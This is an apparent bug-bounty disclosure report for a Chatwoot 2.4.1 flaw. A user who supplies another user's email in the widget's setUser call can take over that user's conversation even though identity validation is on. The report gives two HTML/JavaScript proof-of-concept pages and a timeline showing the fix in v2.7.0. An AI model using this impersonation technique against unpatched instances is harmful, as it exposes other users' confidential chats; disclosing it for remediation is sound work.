Remote access to another's conversation based on their email address in chatwoot/chatwoot

Valid

Reported on

Apr 22nd 2022


System:

  • Chatwoot 2.4.1, self-hosted
  • User identity validation is enabled
  • Each client has a unique identifier and a corresponding valid hmac

Description

User B can impersonate User A and access User A's chat history by supplying User A's email address in the `setUser` call, even though the two users share neither the same unique ID nor the same HMAC.

I can reproduce it and have recorded a screencast.

Proof of Concept

IN USER A BROWSER:

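<html>
<head>
    <script>
        // CHATWOOT INITIALISATION
        // Inject the widget SDK from the self-hosted instance and start it with
        // the site's public website token once the script has loaded.
        // (The loader is kept on separate lines: collapsed onto one line, the
        // "//" comment above would swallow the whole loader.)
        const t = "script";
        const d = document;
        const g = d.createElement(t);
        const s = d.getElementsByTagName(t)[0];
        g.src = "https://chatbot.helmo.be/packs/js/sdk.js";
        g.defer = true;
        g.async = true;
        s.parentNode.insertBefore(g, s);
        g.onload = () => {
            window.chatwootSDK.run({
                websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX",
                baseUrl: "https://chatbot.helmo.be",
            });
        };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', () => {
            // CHATWOOT USER'S CONFIGURATION
            // This is the legitimate User A session: identifier, HMAC and
            // e-mail address all belong to User A (the original listing's
            // comments mislabelled them as User B's).
            const userConfig = {
                // USER-A UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "B3E5BD88D0FE9E92CD04DA7EF5A449FDD1C807DE495E659F56FA400AD02613C1",

                // USER-A VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "0a7331f5482b26cf6e74aa4294e6890b5eb9593ec71f9edad8cf9f24f9704fa5",

                // USER-A E-MAIL ADDRESS (the value User B later claims in the
                // second listing)
                email: "test-user-a@gmail.com",
            };

            console.log(`user identifier: ${userConfig.tokenPublicUtilisateur}`);
            console.log(`user hmac: ${userConfig.hmacUtilisateur}`);
            console.log(`user email: ${userConfig.email}`);

            // USER-A INITIALISATION
            // Note that identifier_hash only authenticates the identifier; the
            // e-mail is passed as a plain, unauthenticated attribute.
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null,
            });
        });
    </script>
</head>

</html>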

IN USER B BROWSER:

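<html>
<head>
    <script>
        // CHATWOOT INITIALISATION
        // Inject the widget SDK from the self-hosted instance and start it with
        // the site's public website token once the script has loaded.
        // (The loader is kept on separate lines: collapsed onto one line, the
        // "//" comment above would swallow the whole loader.)
        const t = "script";
        const d = document;
        const g = d.createElement(t);
        const s = d.getElementsByTagName(t)[0];
        g.src = "https://chatbot.helmo.be/packs/js/sdk.js";
        g.defer = true;
        g.async = true;
        s.parentNode.insertBefore(g, s);
        g.onload = () => {
            window.chatwootSDK.run({
                websiteToken: "xnsdyXjCDy5nWb9L1xTKXERX",
                baseUrl: "https://chatbot.helmo.be",
            });
        };

        // USER INITIALISATION
        window.addEventListener('chatwoot:ready', () => {
            // CHATWOOT USER'S CONFIGURATION
            // User B's own identifier and HMAC, combined with User A's e-mail.
            // The identifier/HMAC pair is genuinely valid for User B, so
            // identity validation passes; the e-mail is the only forged field.
            const userConfig = {
                // USER-B UNIQUE IDENTIFIER -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                tokenPublicUtilisateur: "72907A68EC50F17ABD2D1E09EDDCA7102C9679C9E40B612E306DC8C2AA6BD054",

                // USER-B VALID HMAC BASED ON USER UNIQUE IDENTIFIER AND CHATWOOT PRIVATE KEY -- COMES FROM OUR SERVER BUT HERE IS AN EXAMPLE
                hmacUtilisateur: "da1e4d7464a01209b7e6c00977e095868b014f7248d678c0dfcf38e5e749eb2f",

                // USER-A E-MAIL ADDRESS
                // USER-B CLAIMS TO HAVE USER-A'S E-MAIL ADDRESS
                email: "test-user-a@gmail.com",
            };

            console.log(`user identifier: ${userConfig.tokenPublicUtilisateur}`);
            console.log(`user hmac: ${userConfig.hmacUtilisateur}`);
            console.log(`user email: ${userConfig.email}`);

            // USER-B INITIALISATION
            // Reported behaviour: the server resolves the contact by the
            // unauthenticated e-mail attribute rather than by the HMAC-bound
            // identifier, so this session lands in User A's conversation.
            // With identity validation enabled, contact lookup should be keyed
            // only on the verified identifier, never on caller-supplied e-mail.
            window.$chatwoot.setUser(userConfig.tokenPublicUtilisateur, {
                identifier_hash: userConfig.hmacUtilisateur,
                name: null,
                email: userConfig.email,
                phone_number: null,
            });
        });
    </script>
</head>

</html>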

Impact

Access to confidential conversations and impersonation of another user.

We are processing your report and will contact the chatwoot team within 24 hours. a year ago
We have contacted a member of the chatwoot team and are waiting to hear back a year ago
We have sent a follow up to the chatwoot team. We will try again in 7 days. a year ago
We have sent a second follow up to the chatwoot team. We will try again in 10 days. a year ago
We have sent a third and final follow up to the chatwoot team. This report is now considered stale. a year ago
Sojan Jose validated this vulnerability a year ago

thanks a lot for the report. We were able to replicate this on our end.

Nicolas M. has been awarded the disclosure bounty
The fix bounty is now up for grabs
The researcher's credibility has increased: +7
We have sent a fix follow up to the chatwoot team. We will try again in 7 days. a year ago
We have sent a second fix follow up to the chatwoot team. We will try again in 10 days. a year ago
We have sent a third and final fix follow up to the chatwoot team. This report is now considered stale. a year ago
Sojan Jose marked this as fixed in v2.7.0 with commit f71980 a year ago
The fix bounty has been dropped
This vulnerability will not receive a CVE